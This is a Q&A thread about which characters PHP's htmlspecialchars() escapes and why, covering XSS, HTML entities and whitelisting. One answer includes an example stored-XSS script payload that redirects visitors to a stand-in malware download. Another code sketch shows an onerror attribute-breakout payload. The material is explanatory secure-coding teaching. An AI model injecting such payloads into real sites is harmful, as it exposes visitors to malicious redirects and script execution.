Why are these 5 (6?) characters considered "unsafe" HTML characters?

In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:

  • & (ampersand) is converted to &amp;
  • " (double quote) is converted to &quot;
  • ' (single quote) is converted to &#039; (only if the flag ENT_QUOTES is set)
  • < (less than) is converted to &lt;
  • > (greater than) is converted to &gt;
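
The substitutions listed above can be sketched in a few lines. This is a Python illustration only, not PHP's actual implementation: the function name `escape_special_chars` and its `quotes` parameter are made up for this example, with `quotes=True` standing in for the ENT_QUOTES flag. One detail worth noticing is that the ampersand has to be replaced first.

```python
def escape_special_chars(text: str, quotes: bool = False) -> str:
    """Hypothetical re-creation of the five substitutions listed above."""
    # The ampersand must be handled first; otherwise the "&" introduced by
    # the later replacements would itself be escaped a second time.
    text = text.replace("&", "&amp;")
    text = text.replace("<", "&lt;")
    text = text.replace(">", "&gt;")
    text = text.replace('"', "&quot;")
    if quotes:
        # Stand-in for PHP's ENT_QUOTES flag.
        text = text.replace("'", "&#039;")
    return text


print(escape_special_chars('<a href="x">Tom & Jerry\'s</a>', quotes=True))
# prints: &lt;a href=&quot;x&quot;&gt;Tom &amp; Jerry&#039;s&lt;/a&gt;
```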

Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.

I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential JavaScript with <script> and all that.

Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?


Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:

[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]

(source)

Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?


Finally, all this begs the question:

Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?

Treen answered 10/3, 2017 at 22:14 Comment(3)
This doesn't really answer your question, but does speak to #3 somewhat: Use a whitelist, not a blacklist, when filtering for XSS vulnerabilities and the like. If you must allow HTML, make it an extremely limited subset. Trying to filter out every possible bad entry is significantly harder than only allowing good entries. - Ongun
@Ongun Thanks - I agree that simply escaping those 5(6?) characters is not the best way to prevent vulnerabilities. My question is more about why exactly those 5 characters were considered "more important" than others, and if there are others that should be put in the same bag, such as the backtick, perhaps. - Treen
Now, is anyone willing to guess what is wrong with this question? I received a random downvote without explanation. I would like to improve/fix the question, but without a comment I can't do that. Thanks. - Treen

Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.

Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).

Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.

Now I submit a comment that looks like this:

<script type="text/javascript">
    window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>

And suddenly, everyone who visits your page is redirected to a virus download. The naive approach here is just to say, okay, well then, let's filter out some of the important characters in that attack:

< and > will be replaced with &lt; and &gt; and now suddenly our script isn't a script. It's just some HTML-looking text.
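
To make the difference concrete, here is a rough sketch in Python, where `html.escape()` plays a role similar to `htmlspecialchars()`. The page fragment and the `comment` value are invented for illustration; the point is only that the escaped version no longer contains a real `<script>` tag.

```python
import html

# A hostile comment, as it might come out of the database.
comment = '<script type="text/javascript">alert("hi");</script>'

# Naive approach: interpolate the raw comment straight into the page.
unsafe_page = "<div class='comment'>" + comment + "</div>"

# Escaped approach: html.escape() turns &, < and > (and, by default, quotes)
# into entities, so the browser displays the text instead of running it.
safe_page = "<div class='comment'>" + html.escape(comment) + "</div>"

print(unsafe_page)
print(safe_page)
```

In the second output the comment appears as `&lt;script ...&gt;`, which a browser shows as literal text.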

A similar situation arises with a comment like

Something is <<wrong>> here.

Suppose a user used <<...>> for emphasis for some reason. Their comment would render as

Something is <> here.

Obviously not desirable behavior.

A less malicious situation arises with &. The & character introduces HTML entities such as &amp; and &quot; and &lt; etc. So it's fairly easy for innocent-looking text to accidentally contain an HTML entity and end up looking very different and very odd to a user.

Consider the comment

I really like #455 &#243; please let me know when they're available for purchase.

This would be rendered as

I really like #455 ó please let me know when they're available for purchase.

Obviously not intended behavior.
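
The same effect can be reproduced outside a browser. In this small Python sketch, `html.unescape()` is used as an approximation of how a browser decodes character references (an assumption for illustration, not a full HTML parser), and `html.escape()` shows how escaping the ampersand preserves the original text.

```python
import html

comment = "I really like #455 &#243; please let me know"

# Without escaping, the "&#243;" sequence is decoded as a character reference.
rendered_raw = html.unescape(comment)
print(rendered_raw)

# With escaping, the ampersand becomes &amp;, so decoding gives back
# exactly what the user typed.
escaped = html.escape(comment)
rendered_escaped = html.unescape(escaped)
print(escaped)
print(rendered_escaped == comment)
```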

The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.

To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.

As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
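
As a minimal sketch of what a whitelist check could look like, assume a field such as a username that is only ever allowed to contain letters, digits, underscores and hyphens. The rule, the length limit and the names `USERNAME_PATTERN` and `is_valid_username` are hypothetical and would need to be adapted to the actual input.

```python
import re

# Hypothetical rule: 1 to 32 characters, each a letter, digit, "_" or "-".
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_valid_username(value: str) -> bool:
    """Accept the value only if every character is on the allowed list."""
    return USERNAME_PATTERN.fullmatch(value) is not None


print(is_valid_username("treen_42"))
print(is_valid_username("<script>"))
```

Anything not explicitly allowed is rejected, so there is no need to enumerate every dangerous character. Free-form text such as comments still needs escaping on output.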

Ongun answered 11/3, 2017 at 21:25 Comment(3)
Thank you very much. How about the quotes? They are used to surround attributes, very well, I know that, but can you elaborate on that? Can they do harm/unintended things by themselves? (i.e. without the "help" of <>) - Treen
Maybe. I'm extremely hesitant to say "no" outright. There are some more details to check out here: owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet. The most obvious issue is if you take user input and slap it into an attribute; then quotes can cause harm by escaping the attribute itself. E.g., if you allow users to enter an image title and use it in the title attribute of the img tag, users could potentially change the img tag's src attribute just by breaking out of the quotes. - Ongun
Context is everything. The htmlspecialchars() PHP function is simply a general function for escaping characters that can have special meaning in an HTML document (anywhere in that HTML document). It is not just for making output "safe". In fact, the PHP docs make no reference to "unsafe" characters. Quotes are perfectly OK when used in a body of text, but can break the output when used inside an HTML attribute (but only if the same quotes are used to delimit the attribute). Backticks could be problematic if you are parsing output for Markdown. Context matters. - Patchouli
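
The attribute case from these comments can be sketched as follows. The helper `img_tag`, the image path and the payload are hypothetical, and Python's `html.escape()` is used in place of `htmlspecialchars()`. Note that the payload contains neither < nor >.

```python
import html


def img_tag(title: str, escape: bool) -> str:
    """Hypothetical helper that places user-supplied text in a title attribute."""
    if escape:
        # quote=True also escapes " and ', which is what matters here.
        title = html.escape(title, quote=True)
    return '<img src="/photo.png" title="' + title + '">'


payload = 'x" onerror="alert(1)'

print(img_tag(payload, escape=False))
# prints: <img src="/photo.png" title="x" onerror="alert(1)">
print(img_tag(payload, escape=True))
# prints: <img src="/photo.png" title="x&quot; onerror=&quot;alert(1)">
```

In the first output the double quote closes the title attribute early and the rest of the input becomes a new attribute. In the second, the whole input stays inside the title value.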

These characters are unsafe because in HTML, < and > delimit a tag.
The " and ' characters are used to surround attribute values.
The & is encoded because it introduces HTML entities.
No other characters need to be encoded, but they can be, for example:
the trademark symbol can be written as &trade;
the US dollar sign can be written as &dollar; and the euro sign as &euro;
Any emoji can be written as an HTML entity (the name for these encoded forms), using a numeric character reference.
You can find an explanation/examples here

Wane answered 10/3, 2017 at 22:25 Comment(1)
Thanks, but this does not answer the question. You just stated where quotes and the ampersand are used. My question is about which symbols are dangerous for allowing injections (and more importantly, why).Treen
